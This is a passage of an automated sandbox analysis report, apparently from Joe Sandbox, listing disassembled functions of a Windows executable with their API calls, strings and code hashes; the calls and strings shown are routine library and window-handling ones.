                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cf680b9f1244563d1736b2f75648be11fd097450f8faa89cd99a43d5d1db73cf
                                                                                              • Instruction ID: 805699e0df239dcda8c5369ce757b92bc3292b4870ac1399f5bbca80a0208a71
                                                                                              • Opcode Fuzzy Hash: cf680b9f1244563d1736b2f75648be11fd097450f8faa89cd99a43d5d1db73cf
                                                                                              • Instruction Fuzzy Hash: 3BE16C7551C3908FC304CF59D89056ABBF0BB9A700F4A0A5EF9C587352C739EA16DBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A35282 Relevance: .3, Instructions: 270COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fbc3703b16c3aae3db15c4d448ff6b4734694cd092f9e90ebe0c6dc9e479c305
                                                                                              • Instruction ID: 727a5c733fde75941316a20173952fa837a7cf6d052cfd849f33f4bf9d91b0e3
                                                                                              • Opcode Fuzzy Hash: fbc3703b16c3aae3db15c4d448ff6b4734694cd092f9e90ebe0c6dc9e479c305
                                                                                              • Instruction Fuzzy Hash: 939157B0A00B459BD724EF7CD991BBA77D5EB94300F10092DF59687282EB74E584C751
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A355B0 Relevance: .2, Instructions: 243COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 931725267d3afae2a79d0ebb937372447d19929da5c01f319e552610ee085862
                                                                                              • Instruction ID: 32426702bc92b6ceb99560031651154caae9caa2d4c02eb05b46ee536ee3c058
                                                                                              • Opcode Fuzzy Hash: 931725267d3afae2a79d0ebb937372447d19929da5c01f319e552610ee085862
                                                                                              • Instruction Fuzzy Hash: D3812571B04B419FEB24DB7CD982BBE37D5ABA4304F140D3DF9868B282DB7098858761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A464D7 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ffbd74cf56ef2c7d8391022c16a09d964bf19f3bcbea992242fae6d3e84d7ecb
                                                                                              • Instruction ID: eb7ecb6d6f29c210e19370c51ee49a596bcc6545dea694abcc59c5d3d48b31cb
                                                                                              • Opcode Fuzzy Hash: ffbd74cf56ef2c7d8391022c16a09d964bf19f3bcbea992242fae6d3e84d7ecb
                                                                                              • Instruction Fuzzy Hash: A5617DBD70070466DF3C5B689995BBEB3A9DFC3744F20081AE843DF185E651DD868217
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A462A8 Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                              • Instruction ID: eb279d10c263f8275e595969dbeef82811127671f95de4ce92023c06458f847b
                                                                                              • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                              • Instruction Fuzzy Hash: B151787CA00785A7DF388F6886567FE27A59BD7304F18092EE882CF282C654FD459357
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A302F7 Relevance: .2, Instructions: 161COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0cfa9c71070b3751736a2e622205b97b3151de0d597ac51fbeaa0e176090b886
                                                                                              • Instruction ID: 922a026c4816e62ab723cd325bc8137b90524f1aef67b338c6cd3fd851a8524f
                                                                                              • Opcode Fuzzy Hash: 0cfa9c71070b3751736a2e622205b97b3151de0d597ac51fbeaa0e176090b886
                                                                                              • Instruction Fuzzy Hash: 3E51A1315093D58FC712CF28C1909AFBFF0AE9A714F4A0999F5D95B242D231DB8ACB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A313FD Relevance: .1, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eb8c619cb72cdf48328bda3d085b270129c574df6b38a3bd43d50674ed52db70
                                                                                              • Instruction ID: 2c66a7d93bef5a3199e1f9cc0f478a0de92fe7d536ebb3c0c7d18fcc8fa7172a
                                                                                              • Opcode Fuzzy Hash: eb8c619cb72cdf48328bda3d085b270129c574df6b38a3bd43d50674ed52db70
                                                                                              • Instruction Fuzzy Hash: A951DFB1A087119FC748CF19D48055AF7E1FF88314F058A2EF899E3740D734E9598B96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A35011 Relevance: .1, Instructions: 112COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
                                                                                              • Instruction ID: 1795d8cd153b35ec4cf6dbe7acc42246002ebf0ebf2c5884bf63d8784c23395a
                                                                                              • Opcode Fuzzy Hash: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
                                                                                              • Instruction Fuzzy Hash: 2231E3B1A14B168FC714EF2CD95126ABBE0EB95300F108A2DF496C7742C735E90ACF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3D884 Relevance: 49.4, APIs: 24, Strings: 4, Instructions: 428windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A3D889
                                                                                                • Part of subcall function 00A3C504: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00A3C5EB
                                                                                              • _wcslen.LIBCMT ref: 00A3DB4F
                                                                                              • _wcslen.LIBCMT ref: 00A3DB58
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00A3DBB6
                                                                                              • _wcslen.LIBCMT ref: 00A3DBF8
                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00A3DD40
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00A3DD7B
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00A3DD8B
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,00A7389A), ref: 00A3DD99
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A3DDC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 2804936435-312220925
                                                                                              • Opcode ID: f7fe41aa12786bb781d1e838e47a45475befe4794e0cb6d91f74a8edc6c720dd
                                                                                              • Instruction ID: 3521235f0c0658506784d06d80562abd651961d1720ec8c2e00fbf54d8f7e12c
                                                                                              • Opcode Fuzzy Hash: f7fe41aa12786bb781d1e838e47a45475befe4794e0cb6d91f74a8edc6c720dd
                                                                                              • Instruction Fuzzy Hash: 8EE144B2D00218ABDF25DBA4ED85EEE73BCAB04354F5444A6F605E7090EF749E85CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2F608 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00A2F62E
                                                                                                • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
                                                                                                • Part of subcall function 00A330F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00A63070,00000200,00A2EC48,00000000,?,00000050,00A63070), ref: 00A33112
                                                                                              • _strlen.LIBCMT ref: 00A2F64F
                                                                                              • SetDlgItemTextW.USER32(?,00A60274,?), ref: 00A2F6AF
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A2F6E9
                                                                                              • GetClientRect.USER32(?,?), ref: 00A2F6F5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A2F795
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A2F7C2
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00A2F7FB
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00A2F803
                                                                                              • GetWindow.USER32(?,00000005), ref: 00A2F80E
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A2F83B
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00A2F8AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                              • String ID: $%s:$CAPTION$d
                                                                                              • API String ID: 2407758923-2512411981
                                                                                              • Opcode ID: 12a73695150c0eb30346bef374cfe41596bf3aa8df570d11e259c580e13cd3e8
                                                                                              • Instruction ID: d7459ad9288249f7a6271d4dd9e4e3e7f38149346e317d3d7ee8e824f225d854
                                                                                              • Opcode Fuzzy Hash: 12a73695150c0eb30346bef374cfe41596bf3aa8df570d11e259c580e13cd3e8
                                                                                              • Instruction Fuzzy Hash: 34817F72508351AFD710DFA8DD89A6BBBF9EB88714F04093DFA85A7250D670E8098B52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4DCE2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 00A4DD26
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D8DE
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D8F0
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D902
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D914
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D926
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D938
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D94A
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D95C
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D96E
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D980
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D992
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D9A4
                                                                                                • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D9B6
                                                                                              • _free.LIBCMT ref: 00A4DD1B
                                                                                                • Part of subcall function 00A4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?), ref: 00A4A680
                                                                                                • Part of subcall function 00A4A66A: GetLastError.KERNEL32(?,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?,?), ref: 00A4A692
                                                                                              • _free.LIBCMT ref: 00A4DD3D
                                                                                              • _free.LIBCMT ref: 00A4DD52
                                                                                              • _free.LIBCMT ref: 00A4DD5D
                                                                                              • _free.LIBCMT ref: 00A4DD7F
                                                                                              • _free.LIBCMT ref: 00A4DD92
                                                                                              • _free.LIBCMT ref: 00A4DDA0
                                                                                              • _free.LIBCMT ref: 00A4DDAB
                                                                                              • _free.LIBCMT ref: 00A4DDE3
                                                                                              • _free.LIBCMT ref: 00A4DDEA
                                                                                              • _free.LIBCMT ref: 00A4DE07
                                                                                              • _free.LIBCMT ref: 00A4DE1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: d834bb1db75a41e3137eadd1f533f3ce1aab065ec04b65967094b81c92d3b4fe
                                                                                              • Instruction ID: 6223d1d6085ed49efe00ed20915a15aa75c38d389a0059d268ed1d0891bc1d64
                                                                                              • Opcode Fuzzy Hash: d834bb1db75a41e3137eadd1f533f3ce1aab065ec04b65967094b81c92d3b4fe
                                                                                              • Instruction Fuzzy Hash: 4831583AA003009FEB20AB38D945F5AB3E9FFA0710F59482AE049DB191DB31AC90CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3E7EE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 00A3E811
                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00A3E83D
                                                                                                • Part of subcall function 00A33316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00A2D523,00000000,.exe,?,?,00000800,?,?,?,00A39E5C), ref: 00A3332C
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A3E859
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A3E870
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00A3E884
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00A3E8AD
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A3E8B4
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00A3E8BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              • API String ID: 3820355801-1882779555
                                                                                              • Opcode ID: 3008e2df4448969e3dd50ba3ea3dffbd48d14d4fc1cef41bde2d9035477c1b70
                                                                                              • Instruction ID: 61e019b8ae2b34fea6c1ab9997b43c90616846f767488c53f0ca4803ddc5e9cf
                                                                                              • Opcode Fuzzy Hash: 3008e2df4448969e3dd50ba3ea3dffbd48d14d4fc1cef41bde2d9035477c1b70
                                                                                              • Instruction Fuzzy Hash: DA11CD32D44B107BE620EBB09C4AFAB2AAEBB54711F004520FE41A50E2DB64890687B5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4A421 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A4A435
                                                                                                • Part of subcall function 00A4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?), ref: 00A4A680
                                                                                                • Part of subcall function 00A4A66A: GetLastError.KERNEL32(?,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?,?), ref: 00A4A692
                                                                                              • _free.LIBCMT ref: 00A4A441
                                                                                              • _free.LIBCMT ref: 00A4A44C
                                                                                              • _free.LIBCMT ref: 00A4A457
                                                                                              • _free.LIBCMT ref: 00A4A462
                                                                                              • _free.LIBCMT ref: 00A4A46D
                                                                                              • _free.LIBCMT ref: 00A4A478
                                                                                              • _free.LIBCMT ref: 00A4A483
                                                                                              • _free.LIBCMT ref: 00A4A48E
                                                                                              • _free.LIBCMT ref: 00A4A49C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 1f53c5c8eb571815355fbb944fb0fc58c1250bd1f4d1ad8f57742b7a688b37b3
                                                                                              • Instruction ID: ff37daa0eb3ff1d3b27bd4b13851a05778408ce723b10d4291cc136080a334d3
                                                                                              • Opcode Fuzzy Hash: 1f53c5c8eb571815355fbb944fb0fc58c1250bd1f4d1ad8f57742b7a688b37b3
                                                                                              • Instruction Fuzzy Hash: 4811A77A150108AFCB01EF54CA52CDD7BB9EF64750F8681A5FA084F122D631EE619B41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A43FC1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
